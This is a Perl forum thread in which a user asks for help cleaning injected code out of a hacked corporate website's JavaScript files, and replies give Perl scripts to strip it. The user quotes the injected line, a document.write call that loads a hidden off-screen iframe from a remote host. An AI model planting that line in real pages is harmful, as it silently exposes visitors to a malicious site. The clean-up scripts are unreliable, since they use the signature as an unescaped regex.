in reply to Hacking of JavaScript files in our corporate website

After having secured the web-server, so it won't happen again, you can use File::Find::Rule and its methods start and match to iterate over all the javascript files. For each such file found, you then open the file, slurp it into an array and loop over the array, deleting any of the "bad" lines and write it again to the javascript file. File::Slurp can assist you here: it has the useful functions edit_file or edit_file_lines which does an easy in-place edit.

CountZero

A program should be light and agile, its subroutines connected like a string of pearls. The spirit and intent of the program should be retained throughout. There should be neither too little or too much, neither needless loops nor useless variables, neither lack of structure nor overwhelming rigidity." - The Tao of Programming, 4.1 - Geoffrey James

My blog: Imperial Deltronics

Replies are listed 'Best First'.
Re^2: Hacking of JavaScript files in our corporate website
by shajiindia (Acolyte) on Dec 17, 2012 at 09:13 UTC
    I am burning the midnight oil to fix it. Thanks for your kind help. It is greatly appreciated.
[reply]

      Here is the code I am working on. It works for sample data, but for the actual data, it is not working. I am working on the backup of the live files and presently using the following script. I am working on Active Perl 5.14 on Windows. Please help.

      #!/usr/bin/perl

use strict;
 
# show no warnings about recursion (we know what we do  )
no warnings "recursion";
 
# specify the file you search here (in this example "corporate" ) :
my $file = '\.js$';
my @jsfiles = ();
 
# specify the directory where you want to start the search (in this ex
+ample ".", the current directory) :
my $searchdir = "C:/scripts/corporate";
my $replace_string = "SAMPLE TEXT TO REPLACE";
 
# Calling the Subroutine, which searches the File
readDirectory($searchdir, $file);

print "\n", '*' x 60, "\n";
foreach my $js (@jsfiles) {

    open JAVASCRIPT, '<', "$js" or die "Cannot open file for read ($!)
+";
    open TEMP, '>', "temp.js" or die "Cannot open file for write ($!)"
+;
    #Enable slurp mode
    local $/;
    my $data = <JAVASCRIPT>;
    $data =~ s/$replace_string//g;
    print TEMP $data;
    close JAVASCRIPT;
    close TEMP;
    unlink $js;
    rename "temp.js", $js;
    print "$js\n";
}
print "\n", '*' x 60, "\n";
 
# We need an Subroutine, which can be called on every sub-directory
sub readDirectory
{
     my $searchdir = shift;
     my $searchfile = shift;
 
     # a little bit output, in which directory the script
     # is searching at the moment (the following line is not necessary
+)
     print "Searching in $searchdir \n";
 
     # Open and close the directory
     opendir DIR, $searchdir or die("An error occured: $!");
     my @files = readdir(DIR);
     closedir DIR;
 
     foreach my $currentFile (@files)
     {
          # In Unix/Linux we have the directorys "." and "..",
          # it's no good idea to scan these, so let them skip.
          next if $currentFile =~ /^\./;
 
          # Lets have a look, if the current "file" is the searched fi
+le,
          # else have a look, if the "file" is an directory,
          # and if its one, lets have a look, if the searched file is 
+into it.
          if ( $currentFile =~ /$searchfile/ )
          {
               # We found the right file, now we can do somthing with 
+it,
               # in this case, we only print a text
               push @jsfiles, "$searchdir/$currentFile";
               print "Found the file: $searchdir/$currentFile\n";
          }
          if ( -d "$searchdir/$currentFile" )
          {
               # The Subroutine i calling hisself with the new paramet
+ers
               readDirectory("$searchdir/$currentFile", $searchfile);
          }
     }
}

      [download]

      Here is a code signature of the hacked .js files

      ;document.write('<iframe width="50" height="50" style="width:100px;hei
+ght:100px;position:absolute;left:-100px;top:0;" src="http : / / ipxlq
+fn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8"></
+iframe>');

      [download]

      I want to make the above code to get replaced instead of the sample pattern.

[reply]
[d/l]
[select]
        It is not more complicated than this: 
        use Modern::Perl;

use File::Find::Rule;
use File::Slurp qw/edit_file_lines/;

my $searchdir = "C:/scripts/corporate";
my $hacker_signature =
q|;document.write('<iframe width="50" height="50" style="width:100px;h
+eight:100px;position:absolute;left:-100px;top:0;" src="http : / / ipx
+lqfn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8">
+</iframe>');|;

my @jsfiles = find( file => name => '*.js' => in => $searchdir );
for my $file (@jsfiles) {
    edit_file_lines
        { $_ = "DELETED HACKED CONTENT\n" if /$hacker_signature/ }
        $file;
}

        [download]
        Warning: Do not run this on a lifelive server. I expect this script to run rather fast, so you can stop the server before you run this. Downtime will be minimal.

        And of course, back-up the files before you start this script.

        CountZero

        A program should be light and agile, its subroutines connected like a string of pearls. The spirit and intent of the program should be retained throughout. There should be neither too little or too much, neither needless loops nor useless variables, neither lack of structure nor overwhelming rigidity." - The Tao of Programming, 4.1 - Geoffrey James

        My blog: Imperial Deltronics
[reply]
[d/l]
[reply]
[d/l]

In Section Seekers of Perl Wisdom